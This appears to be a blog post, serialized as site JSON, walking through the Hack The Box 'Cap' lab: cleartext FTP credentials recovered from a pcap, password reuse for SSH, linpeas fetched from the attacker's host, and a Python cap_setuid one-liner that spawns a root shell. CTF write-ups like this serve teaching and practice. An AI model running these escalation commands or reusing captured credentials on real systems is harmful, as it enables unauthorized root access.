[{"data":1,"prerenderedAt":659},["ShallowReactive",2],{"\u002F2025\u002Fhtb-cap-writeup":3,"surround-\u002F2025\u002Fhtb-cap-writeup":650},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"draft":6,"readingTime":14,"body":19,"_type":643,"_id":644,"_source":645,"_file":646,"_stem":647,"_extension":648,"_original_dir":649},"\u002F2025\u002Fhtb-cap-writeup","2025",false,"","HTB - Cap","A step-by-step guide on how to solve the Hack The Box 'Cap' machine. This write-up covers the initial foothold by analyzing a pcap file to find FTP credentials and privilege escalation by exploiting python capabilities.","2025-10-27T15:49:55.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"2 min read",1.885,113100,377,{"type":20,"children":21,"toc":637},"root",[22,28,44,51,55,69,73,97,101,113,133,137,157,161,167,189,193,214,218,239,243,248,254,275,322,369,373,385,437,472,485,490,525,530,598,622,627,631],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Fapp.hackthebox.com\u002Fmachines\u002FCap",[40],"nofollow",[42],{"type":33,"value":43},"10.10.10.245",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,67],{"type":33,"value":59},"Here we detect that we have 
3 open ports. Let's examine the site on port ",{"type":23,"tag":61,"props":62,"children":64},"code",{"className":63},[],[65],{"type":33,"value":66},"80",{"type":33,"value":68},".",{"type":23,"tag":24,"props":70,"children":72},{"src":71},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F3.jpg",[],{"type":23,"tag":29,"props":74,"children":75},{},[76,78,84,86,95],{"type":33,"value":77},"We are manually inspecting our site. Here we see that we can download a ",{"type":23,"tag":61,"props":79,"children":81},{"className":80},[],[82],{"type":33,"value":83},".pcap",{"type":33,"value":85}," file from the ",{"type":23,"tag":61,"props":87,"children":92},{"className":88,"id":90,"style":91},[89],"example-info","just-like-this","color: #4DFFBE",[93],{"type":33,"value":94},"Security Snapshot (5 Second PCAP + Analysis)",{"type":33,"value":96}," tab.",{"type":23,"tag":24,"props":98,"children":100},{"src":99},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":102,"children":103},{},[104,106,111],{"type":33,"value":105},"When we examine this ",{"type":23,"tag":61,"props":107,"children":109},{"className":108},[],[110],{"type":33,"value":83},{"type":33,"value":112},", we can't find anything inside. The download page already shows how many packets it contains, etc.",{"type":23,"tag":29,"props":114,"children":115},{},[116,118,124,126,131],{"type":33,"value":117},"In this case, we can try to do a directory scan on the ",{"type":23,"tag":61,"props":119,"children":121},{"className":120},[],[122],{"type":33,"value":123},"\u002Fdata\u002F",{"type":33,"value":125}," directory. 
Maybe we can find other ",{"type":23,"tag":61,"props":127,"children":129},{"className":128},[],[130],{"type":33,"value":83},{"type":33,"value":132}," files.",{"type":23,"tag":24,"props":134,"children":136},{"src":135},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":138,"children":139},{},[140,142,148,150,155],{"type":33,"value":141},"Here, when we check the ",{"type":23,"tag":61,"props":143,"children":145},{"className":144,"id":90,"style":91},[89],[146],{"type":33,"value":147},"\u002Fdata\u002F0",{"type":33,"value":149}," directory, we get a ",{"type":23,"tag":61,"props":151,"children":153},{"className":152},[],[154],{"type":33,"value":83},{"type":33,"value":156}," file with packets inside.",{"type":23,"tag":24,"props":158,"children":160},{"src":159},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F6.jpg",[],{"type":23,"tag":45,"props":162,"children":164},{"id":163},"initial-access",[165],{"type":33,"value":166},"Initial Access",{"type":23,"tag":29,"props":168,"children":169},{},[170,172,178,180,188],{"type":33,"value":171},"Now let's download this ",{"type":23,"tag":61,"props":173,"children":175},{"className":174},[],[176],{"type":33,"value":177},"0.pcap",{"type":33,"value":179}," file and examine it with ",{"type":23,"tag":181,"props":182,"children":185},"span",{"className":183,"id":90,"style":184},[89],"color: #77BEF0",[186],{"type":33,"value":187},"Wireshark",{"type":33,"value":68},{"type":23,"tag":24,"props":190,"children":192},{"src":191},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":194,"children":195},{},[196,198,204,206,212],{"type":33,"value":197},"When we examine this file, we find a successful FTP login; because FTP sends credentials in cleartext, the capture exposes the user credentials 
",{"type":23,"tag":61,"props":199,"children":201},{"className":200,"id":90,"style":91},[89],[202],{"type":33,"value":203},"nathan:Buck3tH4TF0RM3!",{"type":33,"value":205},". So let's connect to our open ",{"type":23,"tag":61,"props":207,"children":209},{"className":208,"id":90,"style":91},[89],[210],{"type":33,"value":211},"ftp",{"type":33,"value":213}," server with this information.",{"type":23,"tag":24,"props":215,"children":217},{"src":216},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F8.jpg",[],{"type":23,"tag":29,"props":219,"children":220},{},[221,223,229,231,237],{"type":33,"value":222},"From here we get our ",{"type":23,"tag":61,"props":224,"children":226},{"className":225},[],[227],{"type":33,"value":228},"user.txt",{"type":33,"value":230}," flag. We can't get anything else. So let's try to connect to the open ",{"type":23,"tag":61,"props":232,"children":234},{"className":233,"id":90,"style":91},[89],[235],{"type":33,"value":236},"ssh",{"type":33,"value":238}," port with the user information we have.",{"type":23,"tag":24,"props":240,"children":242},{"src":241},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":244,"children":245},{},[246],{"type":33,"value":247},"And yes, the person used the same password for ssh.",{"type":23,"tag":45,"props":249,"children":251},{"id":250},"privilege-escalation",[252],{"type":33,"value":253},"Privilege Escalation",{"type":23,"tag":29,"props":255,"children":256},{},[257,259,265,267,273],{"type":33,"value":258},"We uploaded our ",{"type":23,"tag":61,"props":260,"children":262},{"className":261},[],[263],{"type":33,"value":264},"linpeas.sh",{"type":33,"value":266}," script to the target's ",{"type":23,"tag":61,"props":268,"children":270},{"className":269},[],[271],{"type":33,"value":272},"\u002Ftmp",{"type":33,"value":274}," directory and ran it with the necessary 
permissions.",{"type":23,"tag":276,"props":277,"children":282},"pre",{"className":278,"code":279,"filename":280,"language":281,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","wget https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Freleases\u002Fdownload\u002F20251017-d864f4c3\u002Flinpeas.sh\ncp linpeas.sh \u002Fvar\u002Fwww\u002Fhtml\n","local","bash",[283],{"type":23,"tag":61,"props":284,"children":285},{"__ignoreMap":7},[286,303],{"type":23,"tag":181,"props":287,"children":290},{"class":288,"line":289},"line",1,[291,297],{"type":23,"tag":181,"props":292,"children":294},{"style":293},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[295],{"type":33,"value":296},"wget",{"type":23,"tag":181,"props":298,"children":300},{"style":299},"--shiki-default:#40A02B;--shiki-dark:#98C379",[301],{"type":33,"value":302}," https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Freleases\u002Fdownload\u002F20251017-d864f4c3\u002Flinpeas.sh\n",{"type":23,"tag":181,"props":304,"children":306},{"class":288,"line":305},2,[307,312,317],{"type":23,"tag":181,"props":308,"children":309},{"style":293},[310],{"type":33,"value":311},"cp",{"type":23,"tag":181,"props":313,"children":314},{"style":299},[315],{"type":33,"value":316}," linpeas.sh",{"type":23,"tag":181,"props":318,"children":319},{"style":299},[320],{"type":33,"value":321}," \u002Fvar\u002Fwww\u002Fhtml\n",{"type":23,"tag":276,"props":323,"children":326},{"className":278,"code":324,"filename":325,"language":281,"meta":7,"style":7},"wget 10.10.14.65\u002Flinpeas.sh\nchmod +x 
linpeas.sh\n.\u002Flinpeas.sh\n","target",[327],{"type":23,"tag":61,"props":328,"children":329},{"__ignoreMap":7},[330,342,360],{"type":23,"tag":181,"props":331,"children":332},{"class":288,"line":289},[333,337],{"type":23,"tag":181,"props":334,"children":335},{"style":293},[336],{"type":33,"value":296},{"type":23,"tag":181,"props":338,"children":339},{"style":299},[340],{"type":33,"value":341}," 10.10.14.65\u002Flinpeas.sh\n",{"type":23,"tag":181,"props":343,"children":344},{"class":288,"line":305},[345,350,355],{"type":23,"tag":181,"props":346,"children":347},{"style":293},[348],{"type":33,"value":349},"chmod",{"type":23,"tag":181,"props":351,"children":352},{"style":299},[353],{"type":33,"value":354}," +x",{"type":23,"tag":181,"props":356,"children":357},{"style":299},[358],{"type":33,"value":359}," linpeas.sh\n",{"type":23,"tag":181,"props":361,"children":363},{"class":288,"line":362},3,[364],{"type":23,"tag":181,"props":365,"children":366},{"style":293},[367],{"type":33,"value":368},".\u002Flinpeas.sh\n",{"type":23,"tag":24,"props":370,"children":372},{"src":371},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":374,"children":375},{},[376,378,384],{"type":33,"value":377},"Here we see that capabilities are set for ",{"type":23,"tag":61,"props":379,"children":381},{"className":380},[],[382],{"type":33,"value":383},"\u002Fusr\u002Fbin\u002Fpython3.8",{"type":33,"value":68},{"type":23,"tag":386,"props":387,"children":389},"alert",{"type":388},"error",[390,399,404,432],{"type":23,"tag":391,"props":392,"children":393},"template",{"v-slot:title":7},[394],{"type":23,"tag":29,"props":395,"children":396},{},[397],{"type":33,"value":398},"What are Linux Capabilities?",{"type":23,"tag":29,"props":400,"children":401},{},[402],{"type":33,"value":403},"Normally, there are two types of processes in 
Linux:",{"type":23,"tag":405,"props":406,"children":407},{},[408,421],{"type":23,"tag":409,"props":410,"children":411},{},[412,419],{"type":23,"tag":181,"props":413,"children":416},{"className":414,"id":90,"style":415},[89],"color: #efb11d",[417],{"type":33,"value":418},"Privileged",{"type":33,"value":420},": Processes belonging to the root user (UID 0). These processes can do anything.",{"type":23,"tag":409,"props":422,"children":423},{},[424,430],{"type":23,"tag":181,"props":425,"children":427},{"className":426,"id":90,"style":415},[89],[428],{"type":33,"value":429},"Unprivileged",{"type":33,"value":431},": Processes belonging to normal users. The permissions of these processes are limited.",{"type":23,"tag":29,"props":433,"children":434},{},[435],{"type":33,"value":436},"Linux Capabilities is a security feature designed to divide the \"do anything\" power of the root user into smaller, more granular pieces. The goal is to give a program only the specific privilege it needs, rather than giving it full root privileges.",{"type":23,"tag":29,"props":438,"children":439},{},[440,442,448,450,455,457,463,465],{"type":33,"value":441},"In our case, ",{"type":23,"tag":61,"props":443,"children":445},{"className":444},[],[446],{"type":33,"value":447},"cap_setuid,cap_net_bind_service+eip",{"type":33,"value":449}," is given for ",{"type":23,"tag":61,"props":451,"children":453},{"className":452},[],[454],{"type":33,"value":383},{"type":33,"value":456},". The most critical capability here is ",{"type":23,"tag":61,"props":458,"children":460},{"className":459},[],[461],{"type":33,"value":462},"cap_setuid",{"type":33,"value":464},". 
",{"type":23,"tag":36,"props":466,"children":469},{"href":467,"rel":468},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fpython\u002F#capabilities",[40],[470],{"type":33,"value":471},"see",{"type":23,"tag":405,"props":473,"children":474},{},[475],{"type":23,"tag":409,"props":476,"children":477},{},[478,483],{"type":23,"tag":181,"props":479,"children":481},{"className":480,"id":90,"style":91},[89],[482],{"type":33,"value":462},{"type":33,"value":484},": Lets a process change its user IDs to arbitrary values with setuid() and related calls, so an interpreter that holds it can switch to UID 0.",{"type":23,"tag":29,"props":486,"children":487},{},[488],{"type":33,"value":489},"So our goal is to run a short script using python3.8 that does these three things:",{"type":23,"tag":491,"props":492,"children":493},{},[494,507,520],{"type":23,"tag":409,"props":495,"children":496},{},[497,499,505],{"type":33,"value":498},"Import the ",{"type":23,"tag":61,"props":500,"children":502},{"className":501},[],[503],{"type":33,"value":504},"os",{"type":33,"value":506}," library.",{"type":23,"tag":409,"props":508,"children":509},{},[510,512,518],{"type":33,"value":511},"Make the current process root by calling the ",{"type":23,"tag":61,"props":513,"children":515},{"className":514},[],[516],{"type":33,"value":517},"os.setuid(0)",{"type":33,"value":519}," function.",{"type":23,"tag":409,"props":521,"children":522},{},[523],{"type":33,"value":524},"Start a new shell with root privileges.",{"type":23,"tag":29,"props":526,"children":527},{},[528],{"type":33,"value":529},"We can combine these into a single line as follows.",{"type":23,"tag":276,"props":531,"children":535},{"className":532,"code":533,"language":534,"meta":7,"style":7},"language-py shiki shiki-themes catppuccin-latte one-dark-pro","\u002Fusr\u002Fbin\u002Fpython3.8 -c 'import os; os.setuid(0); os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", 
\"-p\"])'\n","py",[536],{"type":23,"tag":61,"props":537,"children":538},{"__ignoreMap":7},[539],{"type":23,"tag":181,"props":540,"children":541},{"class":288,"line":289},[542,548,554,558,564,568,573,578,583,588,593],{"type":23,"tag":181,"props":543,"children":545},{"style":544},"--shiki-default:#179299;--shiki-dark:#56B6C2",[546],{"type":33,"value":547},"\u002F",{"type":23,"tag":181,"props":549,"children":551},{"style":550},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[552],{"type":33,"value":553},"usr",{"type":23,"tag":181,"props":555,"children":556},{"style":544},[557],{"type":33,"value":547},{"type":23,"tag":181,"props":559,"children":561},{"style":560},"--shiki-default:#FE640B;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[562],{"type":33,"value":563},"bin",{"type":23,"tag":181,"props":565,"children":566},{"style":544},[567],{"type":33,"value":547},{"type":23,"tag":181,"props":569,"children":570},{"style":550},[571],{"type":33,"value":572},"python3",{"type":23,"tag":181,"props":574,"children":576},{"style":575},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[577],{"type":33,"value":68},{"type":23,"tag":181,"props":579,"children":580},{"style":550},[581],{"type":33,"value":582},"8 ",{"type":23,"tag":181,"props":584,"children":585},{"style":544},[586],{"type":33,"value":587},"-",{"type":23,"tag":181,"props":589,"children":590},{"style":550},[591],{"type":33,"value":592},"c ",{"type":23,"tag":181,"props":594,"children":595},{"style":299},[596],{"type":33,"value":597},"'import os; os.setuid(0); os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", \"-p\"])'\n",{"type":23,"tag":405,"props":599,"children":600},{},[601,611],{"type":23,"tag":409,"props":602,"children":603},{},[604,609],{"type":23,"tag":61,"props":605,"children":607},{"className":606},[],[608],{"type":33,"value":517},{"type":33,"value":610},": Sets the user ID to 0 (root) using the cap_setuid 
capability.",{"type":23,"tag":409,"props":612,"children":613},{},[614,620],{"type":23,"tag":61,"props":615,"children":617},{"className":616},[],[618],{"type":33,"value":619},"os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", \"-p\"])",{"type":33,"value":621},": Replaces the current process with a new \u002Fbin\u002Fbash shell running as root; the -p flag tells bash not to drop privileges when its effective and real user IDs differ.",{"type":23,"tag":29,"props":623,"children":624},{},[625],{"type":33,"value":626},"In this case, we can see that we are root.",{"type":23,"tag":24,"props":628,"children":630},{"src":629},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F11.jpg",[],{"type":23,"tag":632,"props":633,"children":634},"style",{},[635],{"type":33,"value":636},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 
var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":638,"depth":638,"links":639},4,[640,641,642],{"id":47,"depth":305,"text":50},{"id":163,"depth":305,"text":166},{"id":250,"depth":305,"text":253},"markdown","content:posts:2025:htb-cap-writeup.md","content","posts\u002F2025\u002Fhtb-cap-writeup.md","posts\u002F2025\u002Fhtb-cap-writeup","md","\u002Fposts",[651,655],{"_path":652,"title":653,"date":654},"\u002F2025\u002Ftryhackme-publisher-writeup","TryHackMe - Publisher","2025-10-23T16:16:07.000Z",{"_path":656,"title":657,"date":658},"\u002F2025\u002Fhtb-artificial-writeup","HTB - Artificial","2025-10-29T11:40:48.000Z",1776934251589]